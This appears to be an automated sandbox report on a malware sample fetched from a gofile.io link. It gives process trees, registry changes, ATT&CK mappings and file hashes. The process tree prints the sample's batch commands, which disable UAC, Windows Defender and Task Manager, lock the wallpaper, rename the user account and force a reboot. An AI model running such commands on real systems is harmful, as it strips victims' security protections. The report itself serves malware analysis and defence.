Analysis
-
max time kernel
39s -
max time network
41s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
19/05/2025, 15:14
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://gofile.io/d/ky2guY
Resource
win10v2004-20250502-en
Errors
General
-
Target
https://gofile.io/d/ky2guY
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 14 api.gofile.io 16 api.gofile.io -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" reg.exe -
resource yara_rule behavioral1/memory/380-109-0x0000000000400000-0x00000000007BF000-memory.dmp upx behavioral1/memory/380-239-0x0000000000400000-0x00000000007BF000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spongebob.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 17 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "19" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921412781787940" chrome.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings chrome.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 5760 reg.exe 1380 reg.exe 5656 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2392 chrome.exe 2392 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe Token: SeShutdownPrivilege 2392 chrome.exe Token: SeCreatePagefilePrivilege 2392 chrome.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe 2392 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2648 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2392 wrote to memory of 100 2392 chrome.exe 87 PID 2392 wrote to memory of 100 2392 chrome.exe 87 PID 2392 wrote to memory of 608 2392 chrome.exe 88 PID 2392 wrote to memory of 608 2392 chrome.exe 88 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 4056 2392 chrome.exe 89 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90 PID 2392 wrote to memory of 3972 2392 chrome.exe 90
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/ky2guY1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffee412dcf8,0x7ffee412dd04,0x7ffee412dd102⤵PID:100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1900,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2120 /prefetch:32⤵PID:608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2084,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2080 /prefetch:22⤵PID:4056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2512 /prefetch:82⤵PID:3972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3176 /prefetch:12⤵PID:3880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3216 /prefetch:12⤵PID:380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4228 /prefetch:22⤵PID:2396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4588,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4716 /prefetch:12⤵PID:4584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4836,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:5716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5376,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5392 /prefetch:82⤵PID:1788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5720,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5412 /prefetch:82⤵PID:5636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6068,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5936 /prefetch:82⤵PID:2788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5952,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4824 /prefetch:82⤵PID:5000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4708,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4820 /prefetch:82⤵PID:4356
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5944
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2380
-
C:\Users\Admin\Downloads\Xeno.ext\xeno-main\Spongebob\spongebob.exe"C:\Users\Admin\Downloads\Xeno.ext\xeno-main\Spongebob\spongebob.exe"1⤵
- System Location Discovery: System Language Discovery
PID:380 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F2CC.tmp\SpongebobFuck.cmd""2⤵
- System Location Discovery: System Language Discovery
PID:2836 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f3⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:5540
-
-
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵
- System Location Discovery: System Language Discovery
PID:5516
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5656
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5760
-
-
C:\Windows\SysWOW64\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- System Location Discovery: System Language Discovery
PID:5640
-
-
C:\Windows\SysWOW64\reg.exeREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1380
-
-
C:\Windows\SysWOW64\net.exenet user Admin /fullname:"SPONGEBOB WAS HERE!!!"3⤵
- System Location Discovery: System Language Discovery
PID:1504 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB WAS HERE!!!"4⤵
- System Location Discovery: System Language Discovery
PID:5892
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 003⤵
- System Location Discovery: System Language Discovery
PID:1236
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3978855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2648
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:1008
Network
MITRE ATT&CK Enterprise v16
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD5b1cb8a94dec704b47d4357a3d577b684
SHA1b53dd6824f19224a26c83469dd8c05a68b8181ac
SHA2560d581e5d5b18dcb9ab67d0731677597aa29e8b7c95ceff7de255f67df70bf54a
SHA51276852da76000a7fc30d2bad5c592addfd51661771e25c0907be9523449123fcb369ec23c5a2fd5599a92a993854edfa6c315aa3661863bce8cc688474ae7c383
-
Filesize
192B
MD56101f7cfc998328b462cac3b78ae48d8
SHA19155af2d1515b103582fe53a27f47e77f75e40a7
SHA2561b7c0fd68aad28c11db2ddf6452679ba6d8a6041a4a1626e5ad6d3767f3f5247
SHA5128abf656fe55c18d1a0502d449b850b34554128d03589ed699b595e9bdf5e99b38f4b8e69cfebe318bced441db9c980fe44a7c62c4d6d58ad9d486c021c7d46cb
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
10KB
MD5aa3769a03fffccf110789ba6fee63d3f
SHA179c441b2e5484fb1932cf55faf1a8c84b80497fa
SHA25694335ad66d50caa9dc5683748256d755c7c683341699386a54c95f1d2080e597
SHA512f7ceb439a44bcf4e14c88af75b88ef3389bcb7b5df9b8b239cec00179653edb0fb6fd58dffc6a255ebd2fc7000b0f6cd9b8875b01288708b1adef241b0d1ca99
-
Filesize
15KB
MD5e729efef0721795dcd37e91fefe504c8
SHA1e6d9aeb11858ff7af01fbacc769df6efe776441c
SHA256dd886131b239603bd651803f5e321850072bac71afa2c0f38ce33b6b2f9bca2c
SHA512326ab39fe84c0a1d8efd371262742e83bd185359717178360e846fec312483eb826887733cdda30c9dc30c2e125efd048a8915707e91c9d83eb92c43cfbf6839
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize72B
MD508b87f3ce7036b10e0232b701db5590c
SHA1882453d94981393e60afd7f65120882ebcbbecbf
SHA256e0500e09ecee1632954bc6e4bff1332c42ec28cc8419318e04427afa6bbd2a97
SHA512a52b04040066fc10c270810f1d873100fbd5de4baf039e6ff9a809eda8fa9246cd57c918c28c03507d61f48314928be412b7c3d8c614afb714f337c3d11a12f9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d590.TMP
Filesize48B
MD572e800a469b36b3e68016cb67e8a38c0
SHA1dc4564d04822a4dd8fc51469f5d5d00e22362996
SHA25695b83d5f50435d858656e2678b1e6da3340a1882c24dce6ef8e0b48ad8ffbe6c
SHA512d7dcb7d5d2697f1d2be120dced3ed1b358b19098056eb7925f0a3a641333a1afc577537d57748bd0f1242c1b2505a7800eeba33cd9a9886afd46b97c3e09cd45
-
Filesize
79KB
MD5563aa971a36891fe4d27aef0b3bfd23a
SHA10799cedd7d6f57c1e239fd3092c9941b163c2496
SHA256405a766f9eee795fa2c3ca36ae867c6bc7c8a2ccbcf8aa43e21f6b5d746651d5
SHA5123b8f45c0001ef3f81e8e827068624b0d3a92c2d9d2fcbb1c345fbcdc33514ddccb3d622d78a9c6ba835271dc275ff584174722378f34ab718b88bdc1efb4525d
-
Filesize
80KB
MD524d129fcb696a93574908da5ca988c78
SHA1242f9ac3770a03cd020613eb1e3f04f968455723
SHA256291ab33bb3cca864e8930e51ae648ea28e77a3e71984dfb1c33199713be4c239
SHA5129520434ed3160e663cde53a9abea4af698b682c3a0bc3f188047e78e77d950df6bf3d7a6852b4d9058f194ce80567054c715620fe055ae17487c7d08bc304dd7
-
Filesize
80KB
MD5a76c80abd3b724e6b5ecf9eb31dcba71
SHA1285b506576c7745f393644339eecccfb8bf0ef29
SHA256fb1334c8dbd9a049082e0c41367f64f35d7e5b7c9ed6773b2af8c8c694841757
SHA5124b56c10c7b1b5b870f56cbae7f6f1bd5bcbaea2b6e0e5557b781dc8567084687c9685e380ea26d9029569ce6e1b6dc8693bfa621955686b596f6765dcc7699f2
-
Filesize
92KB
MD503d8b31db1ed1294334b872f756ad1a1
